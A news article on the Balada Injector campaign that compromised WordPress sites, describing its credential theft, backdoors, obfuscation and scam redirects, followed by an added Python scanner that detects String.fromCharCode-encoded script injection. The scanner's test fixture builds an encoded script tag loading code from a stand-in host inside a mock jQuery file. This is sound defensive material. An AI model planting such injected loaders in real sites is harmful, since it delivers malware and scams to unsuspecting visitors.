1 million WordPress websites infected by the Balada Injector Virus
Since 2017, it’s been reported that over a million WordPress websites have been compromised by a campaign to spread malware known as Balada Injector.
According to GoDaddy’s Sucuri, the extensive campaign “leverages all known and only newly discovered theme and plugin vulnerabilities” to compromise WordPress websites. The attacks are known to occur in waves every few weeks.
According to security expert Dmitry Sinegubko, “this campaign is clearly recognisable by its predilection for String.fromCharCode obfuscation, the use of recently registered domain names hosting malicious scripts on random subdomains, and by redirects to numerous scam sites.”
The scam sites include fake tech support, fake lottery winnings, and malicious CAPTCHA pages that urge users to enable notifications so that the actors can send spam emails.
The report builds on recent findings from Doctor Web, which described a family of Linux malware that compromises unprotected WordPress sites by exploiting flaws in more than two dozen plugins and themes.
In the intervening years, Balada Injector has used more than 100 sites and a wide range of techniques to exploit well-known security flaws (such as HTML injection and Site URL), with the attackers mostly seeking to steal database credentials from the wp-config.php file.
The attacks are also designed to read or download arbitrary site files, including backups, database dumps, and log and error files, and to hunt for tools like adminer and phpmyadmin that site administrators might have left behind after performing maintenance.
In the end, the malware enables the creation of fake WordPress admin users, gathers data from the underlying hosts, and leaves backdoors for persistent access.
To find writable folders that belong to other websites, the Balada Injector malware runs broader searches starting from the top-level directories of the compromised website’s file system.
According to Sinegubko, “most frequently, these sites are owned by the webmaster of the hijacked site, and they all share the same server account and file rights.” In this way, compromising one site can give access to a number of other sites “for free.”
If these attack routes are blocked, a set of 74 predetermined credentials is used to brute force the admin password. WordPress users are therefore advised to keep their website software up to date, remove unnecessary plugins and themes, and use strong WordPress admin passwords.
The findings follow Palo Alto Networks Unit 42’s discovery of a related malicious JavaScript injection campaign that redirects site visitors to adware and fraud domains. Since 2022, more than 51,000 websites have been impacted.
The activity directs victims to booby-trapped pages that pose as a CAPTCHA check and trick them into allowing push notifications, which are then used to serve misleading content. It also uses String.fromCharCode as an obfuscation technique.
Unit 42 researchers noted that “the injected malicious JavaScript code was present on the homepage of more than half of the discovered websites.” They added: “One typical strategy employed by the campaign’s operators was to inject malicious JS code on commonly used JS filenames (for example, jQuery) that are likely to be present on the homepages of compromised websites.”
Because legitimate users are more likely to visit a website’s home page, this could help attackers identify and target them.
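A defender-side check for the String.fromCharCode obfuscation described above, as an added example that is not code from Sucuri, Unit 42 or this article: it decodes long numeric String.fromCharCode calls found in JavaScript files and flags those whose decoded text loads a script or URL. The indicator list, the length threshold, the sample file contents and the example.invalid domain are assumptions constructed for illustration.

```python
import re

# Numeric-argument String.fromCharCode(...) calls (decimal or 0x-hex),
# the obfuscation style the article attributes to these campaigns.
NUM = r"(?:0x[0-9a-fA-F]+|\d+)"
CALL_RE = re.compile(r"String\.fromCharCode\(\s*(" + NUM + r"(?:\s*,\s*" + NUM + r")*)\s*\)")
# Assumed heuristics: text that is suspicious once decoded, and a minimum
# length so short benign calls like fromCharCode(13, 10) are ignored.
INDICATORS = ("<script", "createelement", "document.write", "http://", "https://")
MIN_CODES = 8


def decode_call(arg_list):
    """Decode a comma-separated code list the way JS does (16-bit units)."""
    toks = [t.strip() for t in arg_list.split(",")]
    codes = [int(t, 16) if t.lower().startswith("0x") else int(t) for t in toks]
    return "".join(chr(c & 0xFFFF) for c in codes), len(codes)


def scan_js(name, text):
    """Return one finding per long fromCharCode call found in a JS file."""
    findings = []
    for m in CALL_RE.finditer(text):
        decoded, count = decode_call(m.group(1))
        if count < MIN_CODES:
            continue
        hits = [i for i in INDICATORS if i in decoded.lower()]
        findings.append({"file": name, "offset": m.start(), "decoded": decoded,
                         "indicators": hits, "suspicious": bool(hits)})
    return findings


def scan_all(files):
    return [f for name, text in files.items() for f in scan_js(name, text)]


# Constructed sample input: a stand-in for a commonly used library file with
# an encoded tag appended, plus a file with a short benign call.
PAYLOAD = '<script src="https://abc123.example.invalid/s.js"></script>'
ENCODED = ",".join(str(ord(ch)) for ch in PAYLOAD)
SAMPLE_FILES = {
    "wp-includes/js/jquery/jquery.min.js":
        "/* constructed stand-in */\n(function(){})();\n"
        "document.write(String.fromCharCode(" + ENCODED + "));",
    "assets/newline.js": "var crlf = String.fromCharCode(13, 10);",
}

if __name__ == "__main__":
    for f in scan_all(SAMPLE_FILES):
        print(f["file"], f["offset"], f["indicators"], f["decoded"])
```

On a real site, the same functions can be run over the contents of every .js file under the web root; a finding in a library file that should match its upstream release is a strong reason to compare the file against a clean copy.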